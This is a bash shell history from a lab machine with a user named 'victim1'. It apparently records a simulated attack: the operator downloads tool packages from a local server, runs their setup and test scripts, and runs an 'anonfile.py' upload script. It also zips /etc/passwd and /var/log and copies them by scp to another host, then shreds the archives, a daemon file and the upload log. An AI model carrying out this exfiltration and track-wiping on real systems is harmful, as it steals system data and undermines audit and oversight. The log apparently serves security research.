ifconfig
apt install net-tools
ifconfig
apt-get update
apt-get upgrade
date
timedatectl set-ntp 0
dpkg-reconfigure tzdata
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install openssh-server
nano /etc/ssh/sshd_config
sudo service ssh start
ssh node1@192.168.0.68
mkdir tools
cd tools
ls
curl -LO http:..192.168.0.68:8080/cash-cli-zip
apt install curl
curl -LO http:..192.168.0.68:8080/cash-cli-zip
curl -LO http://192.168.0.68:8080/cash-cli-zip
ifconfig
curl -LO http://192.168.0.68:8080/cash-cli-zip
ls
zip cash-cli-zip 
unzip cash-cli-zip 
ls
unzip cash-cli-zip -d /home/victim1/tools
unzip /home/victim1/tools/cash-cli-zip -d /home/victim1/tools
ls
chmod 755 cash-cli-zip 
unzip /home/victim1/tools/cash-cli-zip -d /home/victim1/tools
apt install unzip
unzip --help
unzip /home/victim1/tools/cash-cli-zip -d /home/victim1/tools/
ls
unzip cash-cli-zip
rm cash-cli-zip 
ls
curl -LO http://192.168.0.68:8080/cash-cli-zip
ls
curl -LO http://192.168.0.68:8080/cash-cli-zip
curl -LO http://192.168.0.68:8080/cash-cli.zip
ls
rm cash-cli-zip 
unzip cash-cli.zip 
ls
rm cash-cli.zip 
ls
cd cash-cli
ls
cat test.js
curl -L http://192.168.0.68:8080/gdrive.tar.gz -o /home/victim1/tools/gdrive.tar.gz
cd tools
ls
unzip gdrive.tar.gz 
tar -xvzf gdrive.tar.gz 
ls
rm gdrive.tar.gz 
mkdir drive
mv gdrive drive/gdrive
ls
cd drive/
ls
cd ..
ls
cd tools
ls
curl -L http://192.168.0.68:8080/khal.zip -o /home/victim1/tools/khal.zip
ls
unzip khal.zip 
ls
rm khal.zip 
ls
cd khal/
ls
tests
ls
cd test
cd tests/
ls
python settings_test.py 
python3 settings_test.py 
cd ..
ls
nano setup.py
cd ..
ls
cd tools/
curl -L http://192.168.0.68:8080/mycli.zip -o /home/victim1/tools/mycli.zip
ls
unzip mycli.zip 
ls
rm mycli.zip 
ls
cd mycli/
ls
cat requirements-dev.txt 
cd test
ls
cat test.txt 
python3 test_main.py 
cd ..
ls
curl -L http://192.168.0.68:8080/pkg-dir-cli.zip -o /home/victim1/tools/pkg-dir-cli.zip
;s
ls
cd ..
ls
unzip pkg-dir-cli.zip 
ls
rm pkg-dir-cli
ls
rm pkg-dir-cli.zip 
ls
cd pkg-dir-cli/
ls
cat test.js
cat license
ls
cd ..
ls
curl -L http://192.168.0.68:8080/pm2.zip -o /home/victim1/tools/pm2.zip
ls
cd tools/
ls
unzip pm2
ls
rm pm2.zip 
ls
cd p,2
cd pm2
ls
cd test
ls
bash e2e.sh
cd ..
ls
cat index.js
curl -L http://192.168.0.68:8080/s3cmd.zip -o /home/victim1/tools/s3cmd.zip
cd tools
ls
unzip s3cmd.zip 
rm s3cmd.zip 
ls
cd s3cmd/
ls
cd S3
ls
cd ..
python3 setup.py
ls
ls /tmp
cd /tmp
python3 anonfile.py
ls
cd /home/victim1
ls
mv daemon /var/daemon
ls
cd tmp
ls
cd /tmp
ls
python3 anonfile.py
cat upload.log
nano anonfile.py 
exit
cd /tmp
ls
python3 anonfile.py
cat upload.log 
shred -zvu -n 5 /var/daemon
exit
cd /tmp
ls
shred -zvu -n 5 upload.log 
exit
ssh victim2@192.168.0.43 -p 22
ls
cd victim1
ls
cd tools
ls
mkdir node2
mkdir node1
ls
cd ..
ls
cd /etc/ssh
cd /etc/sshd_config
nano /etc/sshd_config
vi /etc/sshd_config
ls
cd ..
ls
cd /tmp
ls
echo 1 ?test.txt
echo 1 > test.txt
ls
zip test.zip test.txt
ls
rm test.txt
unzip test.zip
ls
rm test.txt
rm test.zip
ls
exit
cd /tmp
ls
zip passwd.zip -r /etc/passwd && zip var.zip -r /var/log 
ls
scp -r /tmp/passwd.zip node1@192.168.0.68:/home/node1/
scp -r /tmp/var.zip node1@192.168.0.68:/home/node1/
ls
shred -zvu -n 5 passwd.zip
shred -zvu -n 5 var.zip
exit
vi /etc/ssh/sshd_config
service ssh restart
ssh victim2@192.168.0.43
history -w result/history.txt
history -w result/history.txt
history -w result/history.txt
history -w result/history.txt
history -w result/history.txt
history -w result/history.txt
history -w result/history.txt
history -w result/history.txt
history -w result/history.txt
